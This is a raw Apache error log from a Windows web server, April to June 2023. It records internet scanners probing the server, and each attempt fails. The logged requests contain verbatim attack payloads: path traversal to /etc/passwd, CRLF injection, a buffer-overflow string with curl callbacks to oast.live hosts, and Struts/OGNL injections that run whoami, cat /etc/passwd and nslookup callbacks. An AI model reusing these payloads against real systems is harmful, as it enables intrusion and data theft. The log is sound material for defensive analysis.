[Fri Apr 28 22:35:50.027142 2023] [auth_basic:error] [pid 4772:tid 1372] [client 193.142.146.214:49060] AH01618: user root not found: /
[Fri Apr 28 22:35:50.136515 2023] [auth_basic:error] [pid 4772:tid 1372] [client 193.142.146.214:49064] AH01618: user report not found: /
[Sun Apr 30 02:41:03.172874 2023] [cgi:error] [pid 4772:tid 1344] [client 128.14.141.34:38720] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/config.exp
[Sun Apr 30 15:33:46.285327 2023] [authz_core:error] [pid 4772:tid 1456] [client 152.89.196.144:53188] AH01630: client denied by server configuration: C:/bin
[Mon May 01 07:27:31.826983 2023] [authz_core:error] [pid 4772:tid 1392] [client 152.89.196.144:40844] AH01630: client denied by server configuration: C:/bin
[Wed May 03 13:49:11.799358 2023] [auth_basic:error] [pid 4772:tid 1460] [client 80.25.87.93:49814] AH01617: user microland: authentication failure for "/": Password Mismatch
[Wed May 03 15:38:30.658550 2023] [auth_basic:error] [pid 4772:tid 1392] [client 2.136.95.75:50810] AH01618: user admin not found: /
[Wed May 03 15:38:39.615050 2023] [auth_basic:error] [pid 4772:tid 1460] [client 2.136.95.75:50813] AH01618: user Microland not found: /
[Fri May 05 17:02:36.072867 2023] [ssl:error] [pid 4772:tid 1336] [client 54.165.45.44:56056] AH02042: rejecting client initiated renegotiation
[Sat May 06 02:10:56.545624 2023] [core:error] [pid 4772:tid 1336] (20023)The given path was above the root path: [client 14.238.235.157:22077] AH00127: Cannot map GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 to file
[Sat May 06 02:10:57.608123 2023] [authz_core:error] [pid 4772:tid 1336] [client 14.238.235.157:3154] AH01630: client denied by server configuration: C:/etc
[Sat May 06 02:10:58.592500 2023] [authz_core:error] [pid 4772:tid 1336] [client 14.238.235.157:1671] AH01630: client denied by server configuration: C:/bin
[Sun May 07 01:24:09.885414 2023] [auth_basic:error] [pid 4772:tid 1356] [client 14.238.235.157:16071] AH01618: user admin not found: /checkValid
[Sun May 07 01:24:19.163013 2023] [core:error] [pid 4772:tid 1356] (20024)The given path is misformatted or contained invalid characters: [client 14.238.235.157:4479] AH00127: Cannot map POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 to file
[Sun May 07 01:31:12.969746 2023] [cgi:error] [pid 4772:tid 1344] [client 14.238.235.157:2551] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/file_transfer.cgi
[Sun May 07 01:32:02.283077 2023] [core:error] [pid 4772:tid 1344] [client 14.238.235.157:31367] AH10244: invalid URI path (/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/)
[Sun May 07 01:54:06.137488 2023] [core:error] [pid 4772:tid 1344] (20023)The given path was above the root path: [client 103.186.146.107:42238] AH00127: Cannot map GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1 to file
[Sun May 07 01:54:06.137488 2023] [cgi:error] [pid 4772:tid 1336] [client 103.186.146.107:42244] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/admin.cgi
[Sun May 07 01:59:32.097342 2023] [cgi:error] [pid 4772:tid 1336] [client 103.186.146.107:59514] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/slogin
[Sun May 07 02:04:30.213402 2023] [core:error] [pid 4772:tid 1356] [client 103.186.146.107:43290] AH10244: invalid URI path (/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/)
[Sun May 07 02:09:58.097877 2023] [cgi:error] [pid 4772:tid 1460] [client 103.186.146.107:33262] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/kerbynet
[Sun May 07 02:10:05.076364 2023] [auth_basic:error] [pid 4772:tid 1460] [client 103.186.146.107:35268] AH01618: user admin not found: /checkValid
[Sun May 07 02:10:30.101947 2023] [cgi:error] [pid 4772:tid 1460] [client 103.186.146.107:42938] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/file_transfer.cgi
[Sun May 07 02:12:00.051926 2023] [auth_basic:error] [pid 4772:tid 1460] [client 103.186.146.107:41428] AH01618: user admin not found: /mgmt/shared/authn/login
[Sun May 07 02:16:51.061319 2023] [core:error] [pid 4772:tid 1336] (20023)The given path was above the root path: [client 103.186.146.107:41420] AH00127: Cannot map GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 to file
[Sun May 07 02:16:54.083239 2023] [core:error] [pid 4772:tid 1336] (20023)The given path was above the root path: [client 103.186.146.107:42502] AH00127: Cannot map GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1 to file
[Sun May 07 02:16:58.036364 2023] [authz_core:error] [pid 4772:tid 1336] [client 103.186.146.107:43504] AH01630: client denied by server configuration: C:/bin
[Sun May 07 02:17:14.067493 2023] [cgi:error] [pid 4772:tid 1336] [client 103.186.146.107:48474] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/Maconomy
[Sun May 07 02:19:45.049995 2023] [auth_basic:error] [pid 4772:tid 1336] [client 103.186.146.107:36532] AH01614: client used wrong authentication scheme: /upload
[Sun May 07 02:20:14.115474 2023] [core:error] [pid 4772:tid 1336] (20024)The given path is misformatted or contained invalid characters: [client 103.186.146.107:45212] AH00127: Cannot map POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 to file
[Sun May 07 02:25:40.054596 2023] [core:error] [pid 4772:tid 1336] (20024)The given path is misformatted or contained invalid characters: [client 103.186.146.107:53410] AH00127: Cannot map GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0 HTTP/1.1 to file
[Sun May 07 02:25:43.075526 2023] [auth_basic:error] [pid 4772:tid 1336] [client 103.186.146.107:54090] AH01614: client used wrong authentication scheme: /api/get_device_details, referer: https://149.202.94.106/assets/base/home.html
[Sun May 07 02:29:00.065157 2023] [cgi:error] [pid 4772:tid 1336] [client 103.186.146.107:52514] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/mt
[Sun May 07 02:37:05.058250 2023] [auth_basic:error] [pid 4772:tid 1336] [client 103.186.146.107:43460] AH01618: user user not found: /
[Sun May 07 02:37:09.096787 2023] [auth_basic:error] [pid 4772:tid 1460] [client 103.186.146.107:44670] AH01618: user admin not found: /
[Sun May 07 02:38:08.032133 2023] [core:error] [pid 4772:tid 1460] [client 103.186.146.107:36172] AH10244: invalid URI path (/../../etc/passwd)
[Sun May 07 02:43:30.056584 2023] [core:error] [pid 4772:tid 1460] (22)Invalid argument: [client 103.186.146.107:54308] AH00127: Cannot map GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://chbegtkrojc8ied673i0psd7ih4h55jcg.oast.live+-H+%27User-Agent:+AjQRKr%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://chbegtkrojc8ied673i0c87dwazuzyqy1.oast.live+-H+%27User-Agent:+AjQRKr%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 to file
[Sun May 07 02:43:34.066907 2023] [core:error] [pid 4772:tid 1460] (22)Invalid argument: [client 103.186.146.107:55686] AH00127: Cannot map GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://chbegtkrojc8ied673i0ymoweym7g3k3k.oast.live+-H+%27User-Agent:+AjQRKr%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://chbegtkrojc8ied673i0fabrsojhputi4.oast.live+-H+%27User-Agent:+AjQRKr%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 to file
[Sun May 07 02:46:43.057104 2023] [cgi:error] [pid 4772:tid 1460] [client 103.186.146.107:57092] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/login
[Mon May 08 10:55:42.074998 2023] [auth_basic:error] [pid 4772:tid 1344] [client 83.48.14.179:49596] AH01617: user microland: authentication failure for "/": Password Mismatch
[Mon May 08 17:26:02.170112 2023] [authz_core:error] [pid 4772:tid 1304] [client 152.89.196.144:37300] AH01630: client denied by server configuration: C:/bin
[Tue May 09 00:54:25.173182 2023] [cgi:error] [pid 4772:tid 1344] [client 185.180.143.188:55476] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Tue May 09 02:03:16.880356 2023] [auth_basic:error] [pid 4772:tid 1344] [client 150.223.13.162:58330] AH01618: user 8hYTSUFk not found: /manager/html
[Tue May 09 05:52:25.387712 2023] [core:error] [pid 4772:tid 1336] (20023)The given path was above the root path: [client 103.253.147.161:46404] AH00127: Cannot map GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 to file
[Tue May 09 05:52:26.106462 2023] [authz_core:error] [pid 4772:tid 1336] [client 103.253.147.161:57256] AH01630: client denied by server configuration: C:/etc
[Tue May 09 05:52:26.840837 2023] [authz_core:error] [pid 4772:tid 1336] [client 103.253.147.161:57270] AH01630: client denied by server configuration: C:/bin
[Tue May 09 17:22:19.520926 2023] [cgi:error] [pid 4772:tid 1312] [client 185.180.143.8:48136] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/config.exp
[Wed May 10 19:14:22.493052 2023] [cgi:error] [pid 4696:tid 1444] [client 185.180.143.49:49226] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/config.exp
[Thu May 11 14:36:23.298206 2023] [auth_basic:error] [pid 4696:tid 1448] [client 2.138.196.38:52241] AH01617: user microland: authentication failure for "/": Password Mismatch
[Thu May 11 14:36:28.235706 2023] [auth_basic:error] [pid 4696:tid 1448] [client 2.138.196.38:52241] AH01617: user microland: authentication failure for "/": Password Mismatch
[Sat May 13 10:33:51.573454 2023] [authz_core:error] [pid 4696:tid 1416] [client 149.28.106.206:45421] AH01630: client denied by server configuration: C:/etc
[Sun May 14 03:28:36.863431 2023] [cgi:error] [pid 4696:tid 1448] [client 128.14.134.170:37766] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/config.exp
[Sun May 14 06:11:38.669442 2023] [auth_basic:error] [pid 4696:tid 1380] [client 195.170.172.128:39378] AH01618: user 1Q7gch54vEBs9uT8fw8BH83MLHDp6ZDsvF not found: /
[Sun May 14 06:11:42.201026 2023] [auth_basic:error] [pid 4696:tid 1380] [client 195.170.172.128:44284] AH01618: user 0x39de0d3ed067efadba1a4ee178b4eeaaeceffdfd not found: /
[Sun May 14 08:13:23.278793 2023] [core:error] [pid 4696:tid 1416] (20023)The given path was above the root path: [client 123.26.149.179:45104] AH00127: Cannot map GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1 to file
[Sun May 14 08:15:34.571428 2023] [cgi:error] [pid 4696:tid 1380] [client 123.26.149.179:41874] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/file_transfer.cgi
[Sun May 14 10:17:49.609944 2023] [cgi:error] [pid 4696:tid 1416] [client 123.26.149.179:57790] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/nightled.cgi
[Sun May 14 10:42:58.282409 2023] [core:error] [pid 4696:tid 1416] (20024)The given path is misformatted or contained invalid characters: [client 123.26.149.179:58452] AH00127: Cannot map GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1 to file
[Sun May 14 10:43:03.188660 2023] [core:error] [pid 4696:tid 1416] (20024)The given path is misformatted or contained invalid characters: [client 123.26.149.179:58466] AH00127: Cannot map GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20chgn8oreqkgv6jhaiacgh9c995jzybxmg.oast.online%22%29%7D/ HTTP/1.1 to file
[Sun May 14 22:58:37.341277 2023] [cgi:error] [pid 4696:tid 1380] [client 66.94.112.104:40570] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 15 07:56:34.832806 2023] [auth_basic:error] [pid 4696:tid 1380] [client 51.75.144.33:52864] AH01617: user microland: authentication failure for "/": Password Mismatch
[Mon May 15 09:14:58.624241 2023] [core:error] [pid 4696:tid 1416] (20024)The given path is misformatted or contained invalid characters: [client 123.26.149.179:60382] AH00127: Cannot map GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1 to file
[Mon May 15 15:21:25.908937 2023] [auth_basic:error] [pid 4696:tid 1380] [client 103.153.254.110:50232] AH01618: user root not found: /
[Mon May 15 15:21:30.471436 2023] [auth_basic:error] [pid 4696:tid 1380] [client 103.153.254.110:50542] AH01618: user root not found: /
[Tue May 16 07:16:26.082304 2023] [cgi:error] [pid 4696:tid 1424] [client 123.26.149.179:55032] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/touchlist_sync.cgi
[Tue May 16 14:30:46.123995 2023] [authz_core:error] [pid 4696:tid 1448] [client 152.89.196.144:35470] AH01630: client denied by server configuration: C:/bin
[Wed May 17 18:23:43.326592 2023] [authz_core:error] [pid 3152:tid 1472] [client 152.89.196.144:33888] AH01630: client denied by server configuration: C:/bin
[Thu May 18 06:43:08.503588 2023] [auth_basic:error] [pid 3152:tid 1476] [client 192.42.116.198:61005] AH01618: user admin not found: /
[Thu May 18 06:43:08.597385 2023] [auth_basic:error] [pid 3152:tid 1476] [client 192.42.116.198:61005] AH01618: user admin not found: /
[Thu May 18 06:43:09.456760 2023] [auth_basic:error] [pid 3152:tid 1472] [client 185.220.101.151:25929] AH01618: user admin not found: /
[Thu May 18 06:43:09.800510 2023] [auth_basic:error] [pid 3152:tid 1508] [client 185.129.61.5:65504] AH01618: user admin not found: /
[Thu May 18 06:43:09.816136 2023] [auth_basic:error] [pid 3152:tid 1472] [client 185.220.101.151:25929] AH01618: user admin not found: /
[Thu May 18 06:43:09.863011 2023] [auth_basic:error] [pid 3152:tid 1464] [client 185.220.100.255:15559] AH01618: user admin not found: /
[Thu May 18 06:43:10.097385 2023] [auth_basic:error] [pid 3152:tid 1484] [client 185.220.101.178:2205] AH01618: user admin not found: /
[Thu May 18 06:43:10.238010 2023] [auth_basic:error] [pid 3152:tid 1508] [client 185.129.61.5:65504] AH01618: user admin not found: /
[Thu May 18 06:43:10.378636 2023] [auth_basic:error] [pid 3152:tid 1464] [client 185.220.100.255:15559] AH01618: user admin not found: /
[Thu May 18 06:43:10.612979 2023] [auth_basic:error] [pid 3152:tid 1484] [client 185.220.101.178:2205] AH01618: user admin not found: /
[Thu May 18 06:43:10.988010 2023] [auth_basic:error] [pid 3152:tid 1476] [client 104.244.76.13:36536] AH01618: user admin not found: /
[Thu May 18 06:43:12.003635 2023] [auth_basic:error] [pid 3152:tid 1476] [client 104.244.76.13:36536] AH01618: user admin not found: /
[Fri May 19 12:37:13.242054 2023] [cgi:error] [pid 3152:tid 1500] [client 149.202.186.109:44260] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/mainfunction.cgi
[Fri May 19 12:37:32.317296 2023] [auth_basic:error] [pid 3152:tid 1476] [client 149.202.186.109:55676] AH01618: user admin not found: /mgmt/tm/util/bash
[Fri May 19 12:37:35.088870 2023] [auth_basic:error] [pid 3152:tid 1472] [client 149.202.186.109:56364] AH01618: user admin not found: /mgmt/tm/util/bash
[Fri May 19 12:38:53.359782 2023] [core:error] [pid 3152:tid 1500] [client 149.202.186.109:49660] AH10244: invalid URI path (/../conf/config.properties)
[Fri May 19 12:43:02.409753 2023] [cgi:error] [pid 3152:tid 1508] [client 149.202.186.109:50518] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/kerbynet
[Sat May 20 12:31:45.571754 2023] [auth_basic:error] [pid 3152:tid 1484] [client 14.163.210.126:57212] AH01618: user admin not found: /mgmt/tm/util/bash
[Sat May 20 12:31:48.340233 2023] [auth_basic:error] [pid 3152:tid 1484] [client 14.163.210.126:57218] AH01618: user admin not found: /mgmt/tm/util/bash
[Sat May 20 12:52:30.882806 2023] [cgi:error] [pid 3152:tid 1484] [client 14.163.210.126:48266] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/mesh.cgi
[Sat May 20 15:21:55.712418 2023] [ssl:error] [pid 3152:tid 1484] [client 54.197.33.221:57712] AH02042: rejecting client initiated renegotiation
[Sat May 20 23:38:12.398415 2023] [cgi:error] [pid 3152:tid 1476] [client 66.94.122.183:57700] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun May 21 02:24:09.967403 2023] [cgi:error] [pid 3152:tid 1460] [client 14.163.210.126:51296] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/mesh.cgi
[Sun May 21 03:13:10.814607 2023] [cgi:error] [pid 3152:tid 1508] [client 14.163.210.126:60638] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/touchlist_sync.cgi
[Sun May 21 03:49:25.478441 2023] [cgi:error] [pid 3152:tid 1476] [client 14.163.210.126:59278] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/downloadFlile.cgi
[Sun May 21 03:49:52.133635 2023] [auth_basic:error] [pid 3152:tid 1476] [client 14.163.210.126:41256] AH01618: user admin not found: /mgmt/tm/util/bash
[Sun May 21 03:50:02.027717 2023] [auth_basic:error] [pid 3152:tid 1460] [client 14.163.210.126:59942] AH01618: user admin not found: /mgmt/tm/util/bash
[Sun May 21 04:22:38.362236 2023] [cgi:error] [pid 3152:tid 1460] [client 14.163.210.126:33988] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/nightled.cgi
[Sun May 21 04:49:11.099654 2023] [core:error] [pid 3152:tid 1460] (20024)The given path is misformatted or contained invalid characters: [client 14.163.210.126:39422] AH00127: Cannot map GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1 to file
[Sun May 21 04:49:13.090765 2023] [core:error] [pid 3152:tid 1460] (20024)The given path is misformatted or contained invalid characters: [client 14.163.210.126:39432] AH00127: Cannot map GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20chl0npreqkgsmbu4kgcgk3ogwxpq9gd3k.oast.fun%22%29%7D/ HTTP/1.1 to file
[Mon May 22 04:27:45.351422 2023] [core:error] [pid 3152:tid 1460] (20023)The given path was above the root path: [client 5.255.113.54:39514] AH00127: Cannot map GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 to file
[Wed May 24 13:20:59.236266 2023] [core:error] [pid 3152:tid 1460] (20023)The given path was above the root path: [client 18.212.209.90:48692] AH00127: Cannot map GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 to file
[Wed May 24 13:20:59.486235 2023] [authz_core:error] [pid 3152:tid 1464] [client 18.212.209.90:48708] AH01630: client denied by server configuration: C:/etc
[Wed May 24 13:20:59.720640 2023] [authz_core:error] [pid 3152:tid 1460] [client 18.212.209.90:48724] AH01630: client denied by server configuration: C:/bin
[Sun May 28 00:07:38.598626 2023] [ssl:error] [pid 3152:tid 1460] [client 44.211.62.86:41806] AH02042: rejecting client initiated renegotiation
[Sun May 28 04:07:55.094837 2023] [cgi:error] [pid 3152:tid 1452] [client 128.1.248.42:60780] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/config.exp
[Sun May 28 05:22:36.986254 2023] [authz_core:error] [pid 3152:tid 1452] [client 193.122.186.239:33499] AH01630: client denied by server configuration: C:/bin
[Mon May 29 01:41:04.940334 2023] [core:error] [pid 3152:tid 1368] (20023)The given path was above the root path: [client 194.163.133.36:46884] AH00127: Cannot map GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 to file
[Mon May 29 01:41:04.987211 2023] [authz_core:error] [pid 3152:tid 1368] [client 194.163.133.36:46890] AH01630: client denied by server configuration: C:/etc
[Mon May 29 01:41:05.034408 2023] [authz_core:error] [pid 3152:tid 1368] [client 194.163.133.36:46906] AH01630: client denied by server configuration: C:/bin
[Tue May 30 11:08:02.359189 2023] [cgi:error] [pid 3152:tid 1432] [client 185.180.143.81:42430] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/config.exp
[Wed May 31 01:18:51.887759 2023] [ssl:error] [pid 3152:tid 1368] [client 52.91.31.48:39020] AH02042: rejecting client initiated renegotiation
[Wed May 31 01:37:44.140826 2023] [ssl:error] [pid 3152:tid 1368] [client 107.20.87.103:39514] AH02042: rejecting client initiated renegotiation
[Wed May 31 04:49:37.818149 2023] [auth_basic:error] [pid 3152:tid 1432] [client 103.153.254.110:40366] AH01618: user root not found: /
[Sun Jun 04 09:05:33.256788 2023] [auth_basic:error] [pid 3152:tid 1280] [client 128.90.170.24:52356] AH01614: client used wrong authentication scheme: /
[Sun Jun 04 09:05:33.491163 2023] [auth_basic:error] [pid 3152:tid 1280] [client 128.90.170.24:52369] AH01614: client used wrong authentication scheme: /Autodiscover/Autodiscover.xml
[Sun Jun 04 09:05:35.647414 2023] [auth_basic:error] [pid 3152:tid 1220] [client 128.90.170.24:52463] AH01614: client used wrong authentication scheme: /
[Sun Jun 04 09:05:35.959913 2023] [auth_basic:error] [pid 3152:tid 1220] [client 128.90.170.24:52479] AH01614: client used wrong authentication scheme: /Autodiscover/Autodiscover.xml
[Mon Jun 05 10:20:53.657430 2023] [authz_core:error] [pid 3152:tid 1256] [client 52.194.250.118:25817] AH01630: client denied by server configuration: C:/bin
[Mon Jun 05 10:20:56.648856 2023] [core:error] [pid 3152:tid 1256] (20023)The given path was above the root path: [client 52.194.250.118:26483] AH00127: Cannot map GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 to file
[Tue Jun 06 11:25:20.626058 2023] [core:error] [pid 3152:tid 1200] (20023)The given path was above the root path: [client 51.210.183.140:48644] AH00127: Cannot map GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1 to file
[Tue Jun 06 11:25:20.626058 2023] [authz_core:error] [pid 3152:tid 1200] [client 51.210.183.140:48646] AH01630: client denied by server configuration: C:/etc
[Tue Jun 06 11:25:20.641671 2023] [authz_core:error] [pid 3152:tid 1200] [client 51.210.183.140:48648] AH01630: client denied by server configuration: C:/etc
[Tue Jun 06 11:25:20.657285 2023] [core:error] [pid 3152:tid 1200] (20024)The given path is misformatted or contained invalid characters: [client 51.210.183.140:48650] AH00127: Cannot map GET /cgi-bin/.%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 to file
[Tue Jun 06 11:25:20.657285 2023] [authz_core:error] [pid 3152:tid 1200] [client 51.210.183.140:48652] AH01630: client denied by server configuration: C:/etc
[Tue Jun 06 13:10:51.080931 2023] [core:error] [pid 3152:tid 1200] (20023)The given path was above the root path: [client 51.210.183.140:50392] AH00127: Cannot map GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1 to file
[Tue Jun 06 13:10:51.080931 2023] [authz_core:error] [pid 3152:tid 1200] [client 51.210.183.140:50394] AH01630: client denied by server configuration: C:/etc
[Tue Jun 06 13:10:51.096556 2023] [authz_core:error] [pid 3152:tid 1200] [client 51.210.183.140:50396] AH01630: client denied by server configuration: C:/etc
[Tue Jun 06 13:10:51.112183 2023] [core:error] [pid 3152:tid 1200] (20024)The given path is misformatted or contained invalid characters: [client 51.210.183.140:50398] AH00127: Cannot map GET /cgi-bin/.%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 to file
[Tue Jun 06 13:10:51.112183 2023] [authz_core:error] [pid 3152:tid 1200] [client 51.210.183.140:50400] AH01630: client denied by server configuration: C:/etc
[Thu Jun 08 02:33:53.521441 2023] [cgi:error] [pid 3152:tid 1236] [client 144.126.145.102:50996] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Jun 08 05:54:00.712156 2023] [authz_core:error] [pid 3152:tid 1220] [client 185.117.72.19:34630] AH01630: client denied by server configuration: C:/bin
[Thu Jun 08 05:54:00.790281 2023] [core:error] [pid 3152:tid 1220] (20023)The given path was above the root path: [client 185.117.72.19:34640] AH00127: Cannot map GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 to file
[Fri Jun 09 17:22:30.560575 2023] [authz_core:error] [pid 3152:tid 1280] [client 83.97.73.89:55298] AH01630: client denied by server configuration: C:/bin
[Fri Jun 09 17:26:18.488851 2023] [authz_core:error] [pid 3152:tid 1280] [client 210.3.157.160:45357] AH01630: client denied by server configuration: C:/etc
[Fri Jun 09 17:26:19.957601 2023] [authz_core:error] [pid 3152:tid 1280] [client 210.3.157.160:38227] AH01630: client denied by server configuration: C:/bin
[Fri Jun 09 17:48:43.181391 2023] [authz_core:error] [pid 3152:tid 1280] [client 210.3.157.160:43357] AH01630: client denied by server configuration: C:/etc
[Fri Jun 09 17:48:44.462641 2023] [authz_core:error] [pid 3152:tid 1280] [client 210.3.157.160:40897] AH01630: client denied by server configuration: C:/bin
[Sat Jun 10 13:49:40.254330 2023] [authz_core:error] [pid 3152:tid 1280] [client 83.97.73.89:53900] AH01630: client denied by server configuration: C:/bin
[Sun Jun 11 03:00:24.350011 2023] [cgi:error] [pid 3152:tid 1196] [client 45.156.129.2:56386] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/config.exp
[Sun Jun 11 04:07:08.024084 2023] [cgi:error] [pid 3152:tid 1212] [client 23.251.102.74:60992] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/config.exp
[Sun Jun 11 20:16:53.791152 2023] [authz_core:error] [pid 3152:tid 1236] [client 83.97.73.89:39742] AH01630: client denied by server configuration: C:/bin
